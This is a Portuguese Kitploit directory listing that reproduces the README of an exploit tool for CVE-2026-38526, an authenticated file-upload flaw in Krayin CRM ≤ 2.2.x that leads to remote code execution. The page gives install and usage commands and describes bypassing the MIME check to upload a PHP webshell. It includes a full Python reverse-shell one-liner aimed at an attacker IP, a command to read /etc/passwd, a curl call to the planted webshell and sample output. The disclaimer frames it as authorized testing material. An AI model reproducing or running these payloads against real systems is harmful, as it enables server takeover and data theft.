Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-38526 — Exploit automatizado para o Krayin CRM ≤ 2.2.x. | Kitploit
Ferramentas/GitHubGitHub/b0nyo/cve-2026-38526
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed Teaming
GitHubb0nyo/cve-2026-38526

CVE-2026-38526

Exploit automatizado para o Krayin CRM ≤ 2.2.x.

Ver Repositório
há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-38526 - Krayin CRM PHP Upload RCE

Exploit automatizado para Krayin CRM ≤ 2.2.x. Este script explora uma vulnerabilidade de upload de arquivos irrestrito no endpoint TinyMCE (/admin/tinymce/upload), burla a validação de tipo MIME falsificando image/jpeg, faz upload de um webshell PHP e executa comandos arbitrários com privilégios do servidor web.


Detalhes da Vulnerabilidade

PropriedadeValor
CVE IDCVE-2026-38526
Software AfetadoKrayin CRM ≤ 2.2.x
Tipo de VulnerabilidadeUpload Irrestrito de Arquivos → Execução Remota de Código
AutenticaçãoNecessária (qualquer conta de administrador válida)
EndpointPOST /admin/tinymce/upload

Pré-requisitos

  • Python 3.7+
  • Credenciais de administrador válidas para a instância do Krayin CRM alvo
  • Acesso de rede ao aplicativo alvo
  • Biblioteca requests

Instalação

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

Uso

root@kitploit:~
python3 CVE-2026-38526.py -i <URL_ALVO> -u <USUARIO> -p <SENHA> [-c <COMANDO>]

Argumentos

Exemplos

root@kitploit:~
# Verificação básica
python3 CVE-2026-38526.py -i http://alvo.com -u [email protected] -p "AdminPassword123!"

# Comando personalizado
python3 CVE-2026-38526.py -i alvo.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i alvo.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"IP_ATACANTE\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

Fluxo do Exploit

  1. Autenticação: Extrair token CSRF da página de login, autenticar com as credenciais fornecidas
  2. Validação da Sessão: Extrair novo token CSRF do painel autenticado
  3. Upload do Webshell: Enviar payload PHP para /admin/tinymce/upload com tipo MIME falsificado
  4. Execução de Comandos: Executar comandos arbitrários via parâmetro GET do webshell

Exemplo de Saída

root@kitploit:~
[*] Alvo: http://alvo.com
[*] Usuário: [email protected]

[*] Autenticando...
[+] Autenticação bem-sucedida

[*] Enviando webshell...
[+] Webshell enviado: http://alvo.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMADO - Execução Remota de Código

[*] Executando: id
[*] Saída:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Execução manual (curl):
curl 'http://alvo.com/storage/tinymce/abc123def456.php?cmd=id'

Problemas Comuns

Falha na Autenticação: Verifique se as credenciais estão corretas e se a conta existe no alvo.

Falha na Extração do Token CSRF: Certifique-se de que o alvo está executando o Krayin CRM vulnerável e que o endpoint de login está acessível.

Reverse Shell não Conecta: Certifique-se de que seu listener está em execução (nc -lvnp <PORTA>), as regras de firewall permitem conexões de saída e o IP/porta no payload estão corretos.


Aviso Legal

Esta ferramenta é fornecida estritamente para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Os usuários são os únicos responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema alvo. O autor não assume nenhuma responsabilidade por uso indevido ou danos causados por esta ferramenta.


Referências

  • Aviso de Segurança TREXNEGRO - CVE-2026-38526
  • Krayin CRM no GitHub
  • OWASP - Upload Irrestrito de Arquivos

Autor

b0nyo - Implementação do PoC

  • GitHub

TREXNEGRO - Descoberta da Vulnerabilidade

  • Avisos de Segurança
Baixar ferramenta
BandeiraDescriçãoExemplo
-iURL do alvo (com ou sem http://)http://alvo.com ou alvo.com
-uEmail/nome de usuário admin[email protected]
-pSenha do adminAdminPassword123!
-cComando a executar (padrão: id)whoami